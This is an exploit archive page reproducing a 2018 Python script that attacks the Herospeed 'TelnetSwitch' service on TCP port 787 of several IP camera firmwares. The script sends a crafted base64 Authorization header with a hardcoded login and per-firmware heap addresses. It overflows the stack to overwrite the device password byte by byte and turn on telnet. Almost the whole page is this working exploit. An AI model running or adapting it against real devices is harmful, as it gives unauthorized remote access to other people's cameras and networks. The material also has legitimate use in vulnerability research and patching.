首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable T
来源:mcw noemail eu 作者:bashis 发布时间:2018-02-08  
#!/usr/bin/env python2.7
#
# Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd.
# Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd.
#
# [Verified]
# 1) Fullhan IPC FH8830_F22_W_7.1.42.1
# 2) Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
# 3) HiSilicon 3518EV200_OV9732_W_7.1.25.1, 3519V100_IMX274_W_7.1.39.3
# 4) Ambarella s2l55m_imx123_W_7.1.25.2, S2E66_IMX178_W_7.1.3.4
#
# Author: bashis <mcw noemail eu>, 2018
#
import socket
import select
import sys
import argparse
import base64
import struct
import time
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
 
    def __init__(self,verbose):
        self.verbose = verbose
 
    # Check if IP is valid
    def CheckIP(self,IP):
        self.IP = IP
 
        ip = self.IP.split('.')
        if len(ip) != 4:
            return False
        for tmp in ip:
            if not tmp.isdigit():
                return False
            i = int(tmp)
            if i < 0 or i > 255:
                return False
        return True
 
    # Check if PORT is valid
    def Port(self,PORT):
        self.PORT = PORT
 
        if int(self.PORT) < 1 or int(self.PORT) > 65535:
            return False
        else:
            return True
 
    # Check if HOST is valid
    def Host(self,HOST):
        self.HOST = HOST
 
        try:
            # Check valid IP
            socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
            # Now we check if it is correct typed IP
            if self.CheckIP(self.HOST):
                return self.HOST
            else:
                return False
        except socket.error as e:
            # Else check valid DNS name, and use the IP address
            try:
                self.HOST = socket.gethostbyname(self.HOST)
                return self.HOST
            except socket.error as e:
                return False
 
 
if __name__ == "__main__":
 
    INFO =  '\n[Herospeed TelnetSwitch pwn (2018 bashis <mcw noemail eu>)]\n'
    rhost = '192.168.57.20' # Default Remote HOST
    rport = 787         # Default Remote PORT
    BUFFER_SIZE = 1024
 
    try:
        arg_parser = argparse.ArgumentParser(
        prog=sys.argv[0],
                description=('[*] '+ INFO +' [*]'))
        arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
        arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
        args = arg_parser.parse_args()
    except Exception as e:
        print INFO,"\nError: {}\n".format(str(e))
        sys.exit(1)
 
    print INFO
    if args.rport:
        rport = int(args.rport)
 
    if args.rhost:
        rhost = args.rhost
        IP = args.rhost
 
    # Check if RPORT is valid
    if not Validate(True).Port(rport):
        print "[!] Invalid RPORT - Choose between 1 and 65535"
        sys.exit(1)
 
    # Check if RHOST is valid IP or FQDN, get IP back
    rhost = Validate(True).Host(rhost)
    if not rhost:
        print "[!] Invalid RHOST"
        sys.exit(1)
 
    timeout = 5
    socket.setdefaulttimeout(timeout)
 
    #
    # [Payload]
    #
 
    LOGIN = "Lucky787"      # Hardcoded login
    #
    # Fullhan IPC FH8830_F22_W_7.1.42.1
    # Fullhan FH8830_AR0330_FISHEYE_W_7.1.37.5
    #
    PASSWD = "\n\n\n\n\n\n\n\n\n\n\n\n" # Our new password, must be exactly 12 char, and must be '\n'
    MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
    BASE64_NULL = "A" * 232 # Decoded as 0x00 with base64 decode
    HEAP_PWD = 0x00016c8c # Start of the dynamicly generated password, located on heap
 
    #
    # HiSilicon 3518EV200_OV9732_W_7.1.25.1
    #
#   PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
#   MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#   BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#   HEAP_PWD = 0x00016990 # Start of the dynamicly generated password, located on heap
 
    #
    # HiSilicon 3519V100_IMX274_W_7.1.39.3
    #
#   PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
#   MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#   BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#   HEAP_PWD = 0x000267b0 # Start of the dynamicly generated password, located on heap
 
    #
    # Ambarella s2l55m_imx123_W_7.1.25.2
    #
#   PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
#   MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#   BASE64_NULL = "A" * 364 # Decoded as 0x00 with base64 decode
#   HEAP_PWD = 0x00014c3c # Start of the dynamicly generated password, located on heap
 
    #
    # Ambarella S2E66_IMX178_W_7.1.3.4
    #
#   PASSWD = "AAAAAAAAAAAA" # Our new password, must be exactly 12 char, and must be 'A'
#   MESSAGE =  ''+ LOGIN + ':' + PASSWD +''
#   BASE64_NULL = "A" * 108 # Decoded as 0x00 with base64 decode
#   HEAP_PWD = 0x00014c68 # Start of the dynamicly generated password, located on heap
 
    MESSAGE = base64.b64encode(bytes(MESSAGE))
    MESSAGE += BASE64_NULL
 
    #
    # Since the stack overflow writing with only one byte, we need overwrite the password one char at the time (looping twelve times)
    #
    for where in range(0, len(PASSWD)):
        OUT = "GET / HTTP/1.0\nAuthorization: Basic {}{}\n\n".format(MESSAGE,struct.pack('<L',HEAP_PWD)[:3])
        print "Writing to: {}".format(hex(HEAP_PWD))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((rhost, rport))
        s.send(OUT)
        time.sleep(0.5)
        response = s.recv(BUFFER_SIZE).split()
        HEAP_PWD += 0x1 # Next address on heap
 
        if response[1]:
            if response[1] == "200":
                print "({}) OK, telnetd should be open!".format(response[1])
                break
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Adobe Coldfusion 11.0.03.29286
·Dahua Generation 2/3 - Backdoo
·Asterisk 13.17.2 - 'chan_skinn
·MalwareFox AntiMalware 2.74.0.
·Cisco ASA - Crash PoC
·Geovision Inc. IP Camera & Vid
·Geovision Inc. IP Camera/Video
·Hava Tahmin 1.0 Database Discl
·Hazir Site 2.2 Database Disclo
·Gateway 1.0 Database Disclosur
·iPortalx Portal Scripti Databa
·BOCHS 2.6-5 - Buffer Overflow
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved